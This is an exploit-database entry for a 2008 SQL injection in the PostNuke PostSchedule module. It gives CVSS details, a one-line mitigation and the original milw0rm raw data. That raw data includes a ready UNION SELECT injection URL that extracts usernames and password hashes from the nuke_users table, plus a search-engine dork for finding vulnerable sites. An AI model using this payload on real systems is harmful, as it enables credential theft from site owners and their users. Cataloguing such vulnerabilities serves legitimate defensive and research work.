header-logo
Suggest Exploit
vendor:
PostSchedule
by:
Kacper
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PostSchedule
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Postnuke Mod PostSchedule SQL Vuln

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Vuln: Postnuke Mod PostSchedule SQL Vuln
Author: Vuln search Kacper (kacper1964_at_yahoo.pl)
google:"PostSchedule ver 1"

Vuln:

index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

$Severo:
Moga byc rozne tabele np. pn_users, nuke_users itp.

Homepage: http://devilteam.pl/

# milw0rm.com [2008-04-25]

Navigation

Suggest Exploit

Services By CQR